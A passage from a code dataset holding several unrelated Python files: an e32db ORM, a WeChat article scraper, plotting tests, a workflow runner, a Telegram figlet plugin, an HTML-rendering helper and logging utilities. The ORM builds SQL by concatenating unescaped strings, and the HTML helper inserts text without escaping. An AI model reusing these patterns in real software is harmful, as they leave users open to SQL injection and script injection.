Model.sav\"), 'rb'))\n components = model.components_\n\n\n print(\"Regression coef shape\", np.shape(regression_coefs))\n print(\"Components Shape\", np.shape(components))\n regression_coefs = np.dot(regression_coefs, components)\n print(\"Regression coef shape\", np.shape(regression_coefs))\n\n # Reconstrcut R2 Map\n r2_map = reconstruct_r2_map(r2_values, base_directory)\n regression_coefs = reconstruct_coefs(regression_coefs)\n print(\"Regression coefs\", np.shape(regression_coefs))\n print(\"Coef min\", np.min(regression_coefs))\n print(\"Ceof Max\", np.max(regression_coefs))\n\n # View These\n window = coef_viewer(r2_map, regression_coefs)\n window.showMaximized()\n\n app.exec_()\n\n\n","sub_path":"build/lib/Ridge_Regression_Model/Video_Regression_Explorer_SVD.py","file_name":"Video_Regression_Explorer_SVD.py","file_ext":"py","file_size_in_byte":6684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"19914785","text":"# http://www.developer.nokia.com/Community/Wiki/A_simple_ORM_SQL_for_python\n\nfrom __future__ import generators\n\nimport e32db\nimport re\n\ndb = e32db.Dbms()\ndbv = e32db.Db_view()\ndb.open(u'C:\\\\test.db')\n\n# Some helping classes (need more in next version)\nclass String:\n pass\n\nclass Integer:\n pass\n\nclass Float:\n pass\n\nclass column:\n def __init__(self, coltype):\n self.coltype = coltype\n\nclass Mapper(object):\n\n def __init__(self, id=None, **kw):\n if id is None:\n self.id = self._insert(**kw)\n else:\n self.id = id\n\n def _insert(self, **kw):\n names = ','.join(kw.keys())\n values = ','.join(self.quote(k,v) for k,v in kw.items())\n tablename = self.__class__.__name__\n q = u\"INSERT INTO %s(%s) VALUES (%s)\" % (tablename, names, values)\n db.execute(q)\n # get last insert ID\n dbv.prepare(db, u'SELECT id FROM '+tablename+' ORDER BY id DESC')\n dbv.first_line()\n dbv.get_line()\n return dbv.col(1)\n\n def __getattr__(self, name):\n if hasattr(self.mapping, name):\n q = 'SELECT '+name+' FROM '+self.__class__.__name__\n q += ' WHERE id='+str(self.id)\n dbv.prepare(db, unicode(q))\n dbv.first_line()\n dbv.get_line()\n return dbv.col(1)\n else:\n return self.__dict__[name]\n\n def __repr__(self):\n return '<%s id=%d>' % (self.__class__.__name__, self.id)\n\n def quote(self, name, value):\n if getattr(self.mapping, name).coltype == String:\n return \"'%s'\" % value.replace(\"'\", \"''\") # encode single quote\n else:\n return str(value)\n\n def __setattr__(self, name, value):\n if hasattr(self.mapping, name):\n q = 'UPDATE '+self.__class__.__name__+' SET '+name+'='\n q += self.quote(name, value) + \" WHERE id=\" + str(self.id)\n db.execute(unicode(q))\n else:\n self.__dict__[name] = value\n\n def set(self, **kw):\n q = \"UPDATE \"+self.__class__.__name__+\" SET \"\n for k, v in kw.items():\n q += k+'='+self.quote(k,v)+','\n q = q[:-1]+\" WHERE id=%s\" % self.id\n db.execute(unicode(q))\n\n def delete(self):\n q = 'DELETE FROM '+self.__class__.__name__+\" WHERE id=\" + str(self.id)\n db.execute(unicode(q))\n self.id = None\n\n def dict(self):\n names = [k for k in self.mapping.__dict__ if not k.startswith('__')]\n q = 'SELECT '+','.join(names)+' FROM '+self.__class__.__name__\n q += ' WHERE id=' + str(self.id)\n dbv.prepare(db, unicode(q))\n dbv.first_line()\n dbv.get_line()\n dct = {'id': self.id}\n for i in range(dbv.col_count()):\n dct[names[i]] = dbv.col(i+1)\n return dct\n\n def select(cls, where=None, orderby=None):\n q = 'SELECT id FROM '+cls.__name__\n if where:\n q += ' WHERE '+where\n if orderby:\n q += ' ORDER BY '+orderby\n dbv = e32db.Db_view() # need its own cursor\n dbv.prepare(db, unicode(q))\n dbv.first_line()\n for i in range(dbv.count_line()):\n dbv.get_line()\n yield cls(dbv.col(1))\n dbv.next_line()\n select = classmethod(select)\n\n","sub_path":"orm.py","file_name":"orm.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"231939436","text":"import os\n\nimport pdfkit\nimport requests\n\n\nclass wx_gzh(object):\n\n def __init__(self):\n\n self.urls = [\n 'https://mp.weixin.qq.com/s/iH7HFEup3Buue6bJBIDLpA',\n 'https://mp.weixin.qq.com/s/2rFbJ-O2BsHbJTTc2Y6DCQ',\n 'https://mp.weixin.qq.com/s/398e6QnA120k4SMuWI9YnQ',\n 'https://mp.weixin.qq.com/s/iH7HFEup3Buue6bJBIDLpA',\n 'https://mp.weixin.qq.com/s/pBub3TiKcNqOzTIy5hXvUw',\n 'https://mp.weixin.qq.com/s/vZBh0U9ukPUvHG34WK8FyQ',\n 'https://mp.weixin.qq.com/s/RTyTzFzeOIvzdDBtPFFebQ',\n 'https://mp.weixin.qq.com/s/ODFzKOvawG2P-FHkv14E2A',\n 'https://mp.weixin.qq.com/s/RCMAOdTTdNw058B-qcm7Jw'\n ]\n self.config = pdfkit.configuration(\n wkhtmltopdf='C:/Program Files/wkhtmltopdf/bin/wkhtmltopdf.exe') # 这里需要配置一下wkhtmlpdf.exe路径\n self.html_contents = []\n self.zsxq_headers = {\n }\n\n def request_artiacl_content(self):\n \"\"\"\n 获取知识星球的星球id与名称\n \"\"\"\n try:\n for url in self.urls:\n response = requests.get(url=url, headers=self.zsxq_headers) # 一定要加headers,规范写法,就像过马路一样穿红灯有时没事,有时要命!\n if response.status_code == 200: # 注意:这里一定要做200判断,\n self.html_contents.append(\n '公众号原文地址
'.format(\n url) + response.text.replace('data-src', 'src'))\n else:\n continue\n except Exception as e:\n print(e.args)\n finally:\n self.creat_pdf_file('Python绿色通道')\n\n def creat_pdf_file(self, group_title):\n htmls = [] # 这里是存放html文件\n\n for index, file in enumerate(self.html_contents):\n html = '{}.html'.format(index)\n with open(html, 'w', encoding='utf-8') as f: # 点击open函数查看用法,这里是写入不要搞错了\n f.write(file)\n\n htmls.append(html)\n\n try:\n output_file = 'D:/gzh/{}.pdf'.format(group_title)\n if not os.path.exists(output_file): # 过滤掉重复文件\n pdfkit.from_file(htmls, output_file, configuration=self.config,\n ) # 注意这里需要配置一下wkhtmltopdf\n except Exception as e:\n print(e)\n finally:\n for html_file in htmls: # 清除生成的html文件\n os.remove(html_file)\n\n pass\n\n\nif __name__ == '__main__':\n gzh = wx_gzh()\n gzh.request_artiacl_content()\n","sub_path":"wxgzh.py","file_name":"wxgzh.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"214798132","text":"# Author: Christian Brodbeck \nfrom nose.tools import eq_\n\nfrom eelbrain import datasets, plot\nfrom eelbrain._utils.testing import requires_mne_sample_data\n\n\n@requires_mne_sample_data\ndef test_plot_brain():\n \"\"\"Test plot.brain plots\"\"\"\n src = datasets.get_mne_sample(src='ico', sub=[0])['src']\n\n # size\n b = plot.brain.brain(src.source, hemi='rh', w=400, h=300, mask=False)\n eq_(b.screenshot().shape, (300, 400, 3))\n b.set_size(200, 150)\n eq_(b.screenshot().shape, (150, 200, 3))\n b.close()\n # both hemispheres\n b = plot.brain.brain(src.source, w=600, h=300, mask=False)\n eq_(b.screenshot().shape, (300, 600, 3))\n b.set_size(400, 150)\n eq_(b.screenshot().shape, (150, 400, 3))\n b.close()\n\n # plot shortcuts\n p = plot.brain.dspm(src)\n cb = p.plot_colorbar(show=False)\n cb.close()\n p.close()\n\n p = plot.brain.dspm(src, hemi='lh')\n cb = p.plot_colorbar(show=False)\n cb.close()\n p.close()\n\n p = plot.brain.cluster(src, hemi='rh', views='parietal')\n cb = p.plot_colorbar(show=False)\n cb.close()\n p.close()\n\n image = plot.brain.bin_table(src, tstart=0.1, tstop=0.3, tstep=0.1)\n print(repr(image))\n print(image)\n\n # plot p-map\n pmap = src.abs()\n pmap /= src.max()\n p = plot.brain.p_map(pmap, src)\n cb = p.plot_colorbar(show=False)\n cb.close()\n p.close()\n","sub_path":"eelbrain/plot/tests/test_brain.py","file_name":"test_brain.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"583877438","text":"#!/usr/bin/env python\n\n\"\"\"\n.. See the NOTICE file distributed with this work for additional information\n regarding copyright ownership.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\n# Required for ReadTheDocs\nfrom functools import wraps # pylint: disable=unused-import\n\nimport argparse\n\nfrom basic_modules.workflow import Workflow\nfrom utils import logger\n\nimport tool.vre_nf\nfrom tool.vre_nf import WF_RUNNER\n\nimport json\n\n# ------------------------------------------------------------------------------\n\nclass process_WF_RUNNER(Workflow):\n \"\"\"\n Functions for demonstrating the pipeline set up.\n \"\"\"\n\n configuration = {}\n\n def __init__(self, configuration=None):\n \"\"\"\n Initialise the tool with its configuration.\n\n Parameters\n ----------\n configuration : dict\n a dictionary containing parameters that define how the operation\n should be carried out, which are specific to each Tool.\n \"\"\"\n logger.info(\"Processing Test\")\n if configuration is None:\n configuration = {}\n\n self.configuration.update(configuration)\n\n def run(self, input_files, metadata, output_files, output_metadata):\n \"\"\"\n Main run function for processing a test file.\n\n Parameters\n ----------\n input_files : dict\n Dictionary of file locations\n metadata : list\n Required meta data\n output_files : dict\n Locations of the output files to be returned by the pipeline\n\n Returns\n -------\n output_files : dict\n Locations for the output txt\n output_metadata : dict\n Matching metadata for each of the files\n \"\"\"\n\n # Initialise the test tool\n tt_handle = WF_RUNNER(self.configuration)\n tt_files, tt_meta = tt_handle.run(input_files, metadata, output_files, output_metadata)\n\n return (tt_files, tt_meta)\n\n# ------------------------------------------------------------------------------\n\ndef main_json(config, in_metadata, out_metadata):\n \"\"\"\n Main function\n -------------\n\n This function launches the app using configuration written in\n two json files: config.json and input_metadata.json.\n \"\"\"\n # 1. Instantiate and launch the App\n logger.info(\"I. Instantiate and launch the App\")\n from apps.jsonapp import JSONApp\n app = JSONApp()\n \n # Fixing possible problems in the input metadata\n with open(in_metadata,\"r\") as in_metF:\n in_metaArr = json.load(in_metF)\n \n in_fixed = False\n for in_m in in_metaArr:\n if in_m.get('taxon_id',0) == 0:\n in_m['taxon_id'] = -1\n in_fixed = True\n \n if in_fixed:\n with open(in_metadata,\"w\") as in_metF:\n json.dump(in_metaArr,in_metF)\n \n result = app.launch(process_WF_RUNNER,\n config,\n in_metadata,\n out_metadata)\n\n # 2. The App has finished\n logger.info(\"II. Execution finished; see \" + out_metadata)\n\n return result\n\n# ------------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n\n # Set up the command line parameters\n PARSER = argparse.ArgumentParser(description=\"VRE NextFlow workflow runner\")\n PARSER.add_argument(\"--config\", help=\"Configuration file\")\n PARSER.add_argument(\"--in_metadata\", help=\"Location of input metadata file\")\n PARSER.add_argument(\"--out_metadata\", help=\"Location of output metadata file\")\n PARSER.add_argument(\"--log_file\", help=\"Location of the log file\")\n PARSER.add_argument(\"--local\", action=\"store_const\", const=True, default=False)\n\n # Get the matching parameters from the command line\n ARGS = PARSER.parse_args()\n\n CONFIG = ARGS.config\n IN_METADATA = ARGS.in_metadata\n OUT_METADATA = ARGS.out_metadata\n LOCAL = ARGS.local\n \n import sys\n if ARGS.log_file:\n sys.stderr = sys.stdout = open(ARGS.log_file,\"a\")\n \n if LOCAL:\n sys._run_from_cmdl = True # pylint: disable=protected-access\n\n RESULTS = main_json(CONFIG, IN_METADATA, OUT_METADATA)\n","sub_path":"VRE_NF_RUNNER.py","file_name":"VRE_NF_RUNNER.py","file_ext":"py","file_size_in_byte":4732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"31713210","text":"# https://github.com/Skuzzy_xD/TelePyroBot\n\nfrom pyrogram import Client, Filters\nimport pyfiglet\nimport asyncio\n\n@Client.on_message(Filters.command(['figlet'], ['!','.','/']))\nasync def figlet(client, message):\n await asyncio.sleep(0.3)\n ilk_mesaj = await message.reply(\"‌‌‎__asyncio.sleep(0.3)__\")\n\n girilen_yazi = message.text # komut ile birlikle mesajı tut\n\n if len(girilen_yazi.split()) == 1: # eğer sadece komut varsa\n await ilk_mesaj.edit(\"__bişiler söyle__\") # uyarı ver\n return # geri dön\n\n neDedi = \" \".join(girilen_yazi.split()[1:]) # sözü komuttan ayır\n\n sonuc = pyfiglet.figlet_format(neDedi)\n await asyncio.sleep(0.3)\n await ilk_mesaj.edit(f\"‌‌‎`{sonuc}`\")\n","sub_path":"KekikRobot/botAlani/Eklentiler/figlet.py","file_name":"figlet.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"365910155","text":"'''\nCreated on 10 Nov 2009\n\n@author: Kevin Meegan\n'''\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext import db\nfrom google.appengine.ext.webapp.util import run_wsgi_app\nimport image\nimport logging\nimport re\n\"\"\"\nThis module contains utility methods, classes and data which are common to \nall other modules in the project.\n\"\"\"\n\n#Filename for each stylesheet\nscreen_css_file = \"screen.css\"\nhandheld_css_file = \"handheld.css\"\nprint_css_file = \"print.css\"\n\n#HTML redering\nclass html_page():\n text = str(\"\")\n tail = str(\"\")\n top = str(\"\")\n content = str(\"\")\n footer = str(\"\")\n \n def set_title(self, title=None):\n \"\"\"\n Constuctor - creates a new html document Display an HTML header\n \"\"\"\n #super.__init__()\n if (title != None) :\n self.text += \"\\n\"\n self.text += \"\\r\\r%s\\r\" % title\n style = \"\\n\" % screen_css_file\n style += \"\\n\" % handheld_css_file\n style += \"\\n\" % handheld_css_file\n style += \"\\n\" % print_css_file\n self.text += \"%s\\r\\r\" % style\n self.top += (self.div(self.h1(title),'top',None))\n self.tail = \"\"\n \n def li(self,item_text):\n \"\"\"\n Append to the document an HTML list item from the text\n \"\"\"\n return self._generic_item(\"li\",item_text)\n \n def p(self,item_text,item_class=None,item_id=None):\n \"\"\"\n Render an HTML paragraph from the text.\n item_class and item_id specify the CSS attributes\n \"\"\"\n return self._generic_item(\"p\",item_text,item_class,item_id)\n \n def h1(self,item_text,item_class=None,item_id=None):\n \"\"\"\n Render an HTML heading from the text.\n item_class and item_id specify the CSS attributes\n \"\"\"\n return self._generic_item(\"h1\",item_text,item_class,item_id)\n \n def label(self,item_text,item_class=None,item_id=None):\n return self._generic_item(\"label\",item_text,item_class,item_id)\n \n def br(self):\n \"\"\"\n Render an HTML non breaking space .\n \"\"\"\n return self._generic_closed_tag(\"br\")\n \n def divs(self,item_texts,item_class=None,item_id=None):\n \"\"\"\n Render HTML divs from a list of texts .\n item_class and item_id specify the CSS attributes\n \"\"\"\n return self._generic_items(\"div\",item_texts,item_class,item_id)\n \n def div(self,item_text,item_class=None,item_id=None):\n \"\"\"\n Render a HTML div from text.\n item_class and item_id specify the CSS attributes\n \"\"\"\n return self._generic_item(\"div\",item_text,item_class,item_id)\n \n def span(self,item_texts,item_class=None,item_id=None):\n \"\"\"\n Render a HTML span from text.\n item_class and item_id specify the CSS attributes\n \"\"\"\n \n return self._generic_item(\"span\",item_texts,item_class,item_id)\n \n def ul(self,item_texts):\n \"\"\"\n Render an HTML unordered list from a list of texts.\n \"\"\"\n return self._genericl(\"ul\",item_texts)\n \n def ol(self,item_texts):\n \"\"\"\n Render an HTML ordered list from a list of texts.\n \"\"\"\n return self._genericl(\"ol\",item_texts)\n \n def href(self,label,url,id=None):\n \"\"\"\n Render an HTML link from a label and URL.\n id specifies the CSS attribute\n \"\"\"\n if (id==None) :\n text = \"\" % url\n text += \"%s\\n\" % label\n else :\n text = \"\" % id\n text += \"%s\\n\" % label\n return text\n \n def img(self,src,label=None,id=None):\n \"\"\"\n Render an HTML image from an src.\n A label can be optionally specified.\n id specifies the CSS attribute\n \"\"\"\n \n if (label==None):\n label = \"\"\n if (id==None) :\n text = \"\" % src\n text += \"%s\\n\" % label\n else :\n text = \"\" % id\n text += \"%s\\n\" % label\n return text\n \n def form(self,label,action,inputs=None):\n \"\"\"\n Render an HTML form.\n An action and label must be specified. A button will be rendered with the specified\n label. The form will post to the specified action URL.\n A list of inputs can also be specified. \n e.g.\n form_content = list()\n form_content.append(util.form_input('player_id','hidden',str(player.key())))\n form_content.append(util.label(\"Nickname\"))\n form_content.append(util.form_input('nickname','text',player.nickname)) \n form_content.append(util.label(\"Email\"))\n form_content.append(util.form_input('email','text',player.email)) \n body = util.form(\"Change detail\",\"/player/update\", form_content)\n \n \"\"\"\n \n text = \"
\\r\" % action\n if (inputs != None):\n for input in inputs:\n text += input + \"\\r\"\n text += \"
\\r\" % label\n return text\n\n\n def form_get(self,label,action,inputs=None):\n \"\"\"\n Render an HTML form that gets rather than posts.\n An action and label must be specified. A button will be rendered with the specified\n label. The form will post to the specified action URL.\n A list of inputs can also be specified. \n e.g.\n form_content = list()\n form_content.append(util.form_input('player_id','hidden',str(player.key())))\n form_content.append(util.label(\"Nickname\"))\n form_content.append(util.form_input('nickname','text',player.nickname)) \n form_content.append(util.label(\"Email\"))\n form_content.append(util.form_input('email','text',player.email)) \n body = util.form(\"Change detail\",\"/player/update\", form_content)\n \n \"\"\"\n \n text = \"
\\r\" % action\n if (inputs != None):\n for input in inputs:\n text += input + \"\\r\"\n text += \"
\\r\" % label\n return text\n\n def form_input(self,name,type,value=None):\n \"\"\"\n Renders a form input in HTML.\n Used in conjunction with util.form\n e.g.\n form_content = list() \n form_content.append(util.form_input('player_id','hidden',str(player.key())))\n form_content.append(util.label(\"Nickname\"))\n form_content.append(util.form_input('nickname','text',player.nickname)) \n form_content.append(util.label(\"Email\"))\n form_content.append(util.form_input('email','text',player.email)) \n body = util.form(\"Change detail\",\"/player/update\", form_content)\n \n \"\"\"\n text = \"
\\n\"\n return text\n \n def more_pages(self,items,s_page,base_url):\n \"\"\"\n filters a list of items and only renders 10 items indexed by\n s_page from the HTTP header. page is a string 1-10 or last.\n Additionally a list links to each page is also shown \n \"\"\"\n \n no_of_pages = ((items.__len__()-1)/10) + 1\n\n if (re.findall(r'[0-9]+',s_page)) :\n i_page = int(s_page)\n if ((i_page < 1) or (i_page > 10)) :\n i_page = 1\n else :\n if (s_page==\"last\"):\n i_page = no_of_pages\n else :\n i_page = 1\n \n index = (i_page*10)-10\n if (items.__len__() > (index+9)):\n index_bottom = index\n index_top = index+10\n else : \n index_bottom = index\n index_top = items.__len__()\n\n page_of_items = items.__getslice__(index_bottom,index_top)\n\n list_content = \"\"\n for item in page_of_items :\n list_content += item\n \n list_content = self.div(list_content,\"list\",None)\n \n pages = no_of_pages\n if (pages > 1):\n links = \"Page ... \"\n for page in range (1,(pages+1)):\n if (page == i_page):\n links += \"%d \" % i_page\n else:\n url = base_url\n url += \"page=%d\" % page\n links += self.href(\n \"%d\" % page,\n url,\n \"page_link_%d\" % page) + \" \"\n url = base_url\n url += \"page=%d\" % (i_page + 1)\n if ((i_page) < pages):\n links += self.href(\n \"next\",\n url,\n \"page_link_next\")\n \n links = self.div(links,\"page_links\")\n \n else :\n links = \"

\"\n \n return list_content + links\n \n def append_top(self,top):\n self.top += self.div(top,\"top\")\n \n def append_content(self,content):\n self.content += content\n \n def append_footer(self,footer):\n self.footer += self.div(\n footer +\n self.div(\n \"\")\n ,\"footer\",None)\n\n def get_content(self):\n return self.content\n \n def page(self,request_handler):\n \"\"\"\n Render an HTML page list from a title and body.\n This method will produce the header and tail for the document\n based on the title and body.\n The title and H1 will be set to match the title arg.\n The H1 will be placed in a 'top' div, with the body placed in a\n 'container' div.\n \"\"\"\n self.text += self.div(\n self.top + \n self.div(self.content,\"content\",None) + \n self.footer,\n \"container\",None)\n self.text += self.tail\n request_handler.response.out.write(self.text)\n \n #local methods for HTML rendering\n def _genericl(self,tag,item_texts):\n \"\"\"\n local method for rendering lists based on the specified tag\n \"\"\"\n text = \"<%s>\\n\" % tag\n for item_text in item_texts:\n text += self.li(item_text)\n text += \"\\n\" % tag\n return text\n \n def _generic_items(self,tag,item_texts,item_class=None,item_id=None):\n \"\"\"\n local method for rendering with incremental ids.\n Incremental ids aid element identification in unit tests \n \"\"\"\n text = \"\"\n i=0\n for item_text in item_texts:\n if (item_id==None):\n text += self._generic_item(tag,item_text,item_class,i)\n i=i+1\n else:\n text += self._generic_item(tag,item_text,item_class,item_id)\n return text + \"\\n\"\n \n def _generic_closed_tag(self,tag):\n \"\"\"\n local method to render a closed tag based on the arg\n \"\"\"\n text =\"<%s>\\n\" % tag\n return text\n \n def _generic_item(self,tag,item_text,item_class=None,item_id=None):\n \"\"\"\n local method to render an open tag.\n \"\"\"\n tag_text = tag\n if item_class != None:\n tag_text += \" class='%s'\" % item_class\n if item_id != None:\n tag_text += \" id='%s'\" % item_id\n text = \"<%s>\" % tag_text\n text += item_text\n text +=\"\\n\" % tag\n return text\n \n\n#register our page, this is the standard pattern for Google AppEngine\n#application = webapp.WSGIApplication(\n# [('/util/cleanup', CleanDB)\n# ], debug=True)\n# \n#def main():\n# run_wsgi_app(application)\n#\n#if __name__ == \"__main__\":\n# main()\n","sub_path":"appengine/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":12723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"327647176","text":"#!/usr/bin/python3\ndef divisible_by_2(my_list=[]):\n if (my_list is None) or (len(my_list) < 1):\n return\n\n true_list = []\n for i in my_list:\n if (i % 2 == 0):\n true_list.append(True)\n else:\n true_list.append(False)\n\n return true_list\n","sub_path":"0x03-python-data_structures/10-divisible_by_2.py","file_name":"10-divisible_by_2.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"204034345","text":"# -*- coding:utf-8 -*-\nimport os,sys,csv\n\nclass Base(object):\n \"\"\"docstring for Base\"\"\"\n def __init__(self, csv):\n #super(Base, self).__init__()\n self.file = csv\n self.handle = self._open()\n def _open(self):\n try:\n handle = open(self.file, 'r')\n except e:\n print(\"打开文件'%s'失败\" % self.file)\n raise e\n else:\n self.handle = handle\n def _close(self):\n try:\n self.handle.close()\n except e:\n print(\"关闭文件句柄错误\")\n raise e","sub_path":"lib/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"298189783","text":"\"\"\"\nThis module consolidates all local configuration for the script, including modulename collection for logfile name\nsetup and initializing the config file.\nAlso other utilities find their home here.\n\"\"\"\n\nimport configparser\n# import datetime\nimport logging\nimport logging.handlers\nimport os\nimport platform\nimport re\nimport sys\nimport time\nfrom calendar import timegm\nfrom datetime import datetime\nfrom dotenv import load_dotenv\nfrom flask import current_app\n\n\ndef init_env(projectname, filename):\n \"\"\"\n This function will initialize the environment: Find and return handle to config file and set-up logging.\n\n :param projectname: Name that will be used to find ini file in properties subdirectory.\n :param filename: Filename (__file__) of the calling script (for logfile).\n :return: config handle\n \"\"\"\n modulename = get_modulename(filename)\n config = get_inifile(projectname)\n my_log = init_loghandler(modulename)\n my_log.info('Start Application')\n return config\n\n\ndef get_inifile(projectname):\n \"\"\"\n Read Project configuration ini file in subdirectory properties. Config ini filename is the projectname.\n The ini file is located in the properties module, which is sibling of the lib module.\n Environment settings defined in .env file are exported as well. The .env file needs to be in the project main\n directory.\n\n :param projectname: Name of the project.\n :return: Object reference to the inifile.\n \"\"\"\n # Use Project Name as ini file.\n (filepath_lib, _) = os.path.split(__file__)\n (filepath, _) = os.path.split(filepath_lib)\n # configfile = filepath + \"/properties/\" + projectname + \".ini\"\n configfile = os.path.join(filepath, 'properties', \"{p}.ini\".format(p=projectname))\n ini_config = configparser.ConfigParser()\n try:\n f = open(configfile)\n ini_config.read_file(f)\n f.close()\n except FileNotFoundError:\n # If no Config file defined, then return empty dictionary.\n ini_config = {}\n # envfile is 2 levels up from this script\n envpath = os.path.dirname(filepath)\n envfile = os.path.join(envpath, \".env\")\n load_dotenv(dotenv_path=envfile)\n return ini_config\n\n\ndef get_modulename(scriptname):\n \"\"\"\n Modulename is required for logfile and for properties file.\n\n :param scriptname: Name of the script for which modulename is required. Use __file__.\n :return: Module Filename from the calling script.\n \"\"\"\n # Extract calling application name\n (filepath, filename) = os.path.split(scriptname)\n (module, fileext) = os.path.splitext(filename)\n return module\n\n\ndef init_loghandler(modulename):\n \"\"\"\n This function initializes the loghandler. Logfilename consists of calling module name + computername.\n Format of the logmessage is specified in basicConfig function.\n\n :param modulename: The name of the module. Each module will create it's own logfile.\n :return: Log Handler\n \"\"\"\n logdir = os.getenv(\"LOGDIR\")\n loglevel = os.getenv(\"LOGLEVEL\").upper()\n # Define logfileName\n logfn = \"{module}_{host}.log\".format(module=modulename, host=platform.node())\n logfile = os.path.join(logdir, logfn)\n # Configure the root logger\n logger = logging.getLogger()\n level = logging.getLevelName(loglevel)\n logger.setLevel(level)\n # Get logfiles of 1M\n maxbytes = 1024 * 1024\n rfh = logging.handlers.RotatingFileHandler(logfile, maxBytes=maxbytes, backupCount=5)\n # Create Formatter for file\n formatter_file = logging.Formatter(fmt='%(asctime)s|%(module)s|%(funcName)s|%(lineno)d|%(levelname)s|%(message)s',\n datefmt='%d/%m/%Y|%H:%M:%S')\n # Add Formatter to Rotating File Handler\n rfh.setFormatter(formatter_file)\n # Add Handler to the logger\n logger.addHandler(rfh)\n # Configure Console Handler\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n formatter_console = logging.Formatter(fmt='%(asctime)s - %(module)s - %(funcName)s - %(lineno)d - %(levelname)s -'\n ' %(message)s',\n datefmt='%H:%M:%S')\n # Add Formatter to Console Handler\n ch.setFormatter(formatter_console)\n logger.addHandler(ch)\n logging.getLogger('neo4j.bolt').setLevel(logging.WARNING)\n logging.getLogger('httpstream').setLevel(logging.WARNING)\n return logger\n\n\ndef date2epoch(ds):\n \"\"\"\n This function will convert a date time string to epoch for storage in SQLite table.\n\n :param ds: Date time string in format %Y-%m-%d %H:%M:%S\n\n :return: epoch - seconds since 1/01/1970\n \"\"\"\n utc_time = time.strptime(ds, \"%Y-%m-%d %H:%M:%S\")\n return timegm(utc_time)\n\n\ndef get_pic_folders():\n \"\"\"\n This function returns the picture folder structure in a dictionary.\n\n :return: Dictionary keys: public, original, small, medium, source\n \"\"\"\n pic_folders = dict(public=current_app.config[\"PUBLIC_FOLDER\"],\n source=current_app.config[\"SOURCE_FOLDER\"],\n original=current_app.config[\"ORIGINAL_FOLDER\"],\n medium=current_app.config[\"MEDIUM_FOLDER\"],\n small=current_app.config[\"SMALL_FOLDER\"])\n return pic_folders\n\n\ndef reformat_body(string, is_xhtml=True):\n \"\"\"\n This function will wrap http with href for redirecting.\n This function will replace \\n with
.\n However don't do this around valid html identifiers.\n From Drupal - additional info on http://www.php2python.com/wiki/function.reformat_body/\n This is used as a Jinja2 filter.\n\n :param string:\n\n :param is_xhtml:\n\n :return:\n \"\"\"\n # First wrap URLs in href.\n # Only wrap URLs if there is no href in the body text\n string = altfix_urls(string)\n # Then replace \\n with
\n # TODO: add a function that collects strings from within the html DOM domain, so that \\n surrounding htlm (as in\n # TODO: is not touched.\n if is_xhtml:\n return string.replace('\\n', '
\\n')\n else:\n return string.replace('\\n', '
\\n')\n\n\ndef children_sorted(children):\n return sorted(children, key=lambda child: child.content.title)\n\n\ndef nodes_sorted(nodes):\n return sorted(nodes, key=lambda node: node.created, reverse=True)[:10]\n\n\ndef terms_sorted(terms):\n return sorted(terms, key=lambda term: (term.vocabularies.name, term.name))\n\n\nURL_REGEX = re.compile(r'''((?:mailto:|ftp://|http://|https://)[^ <>'\"{}|\\\\^`[\\]]*)''')\n\n\ndef altfix_urls(text):\n if not ('href' in text.lower()):\n return URL_REGEX.sub(r'\\1', text)\n else:\n return text\n\n\ndef fix_urls(text):\n \"\"\"\n Additional info on https://stackoverflow.com/questions/1071191/detect-urls-in-a-string-and-wrap-with-a-href-tag\n\n Not that this does not work if the URL has a href already. These pages may need to be removed.\n\n :param text:\n\n :return:\n \"\"\"\n pat_url = re.compile(r'''\n (?x)( # verbose identify URLs within text\n (http|https|ftp|gopher) # make sure we find a resource type\n :// # ...needs to be followed by colon-slash-slash\n (\\w+[:.]?){2,} # at least two domain groups, e.g. (gnosis.)(cx)\n (/?| # could be just the domain name (maybe w/ slash)\n [^ \\n\\r\"]+ # or stuff then space, newline, tab, quote\n [\\w/]) # resource name ends in alphanumeric or slash\n (?=[\\s.,>)'\"\\]]) # assert: followed by white or clause ending\n ) # end of match group\n ''')\n pat_email = re.compile(r'''\n (?xm) # verbose identify URLs in text (and multiline)\n (?=^.{11} # Mail header matcher\n (?)'\"\\]]) # assert: followed by white or clause ending\n ) # end of match group\n ''')\n\n for url in re.findall(pat_url, text):\n text = text.replace(url[0], '%(url)s' % {\"url\": url[0]})\n\n for email in re.findall(pat_email, text):\n text = text.replace(email[1], '%(email)s' % {\"email\": email[1]})\n\n return text\n\n\ndef datestamp(epoch):\n \"\"\"\n This is a Jinja2 filter\n\n :param epoch: Unix timestamp - seconds since 1/01/1970 UTC\n\n :return: Date in format 'DD/MM/YY HH:MM\n \"\"\"\n return datetime.fromtimestamp(epoch).strftime('%d/%m/%y')\n\n\ndef monthdisp(ym):\n \"\"\"\n This is a Jinja2 filter to convert %Y-%m into month Year.\n\n :param ym: Date in %Y-%m format\n\n :return: Date in month Year format.\n \"\"\"\n 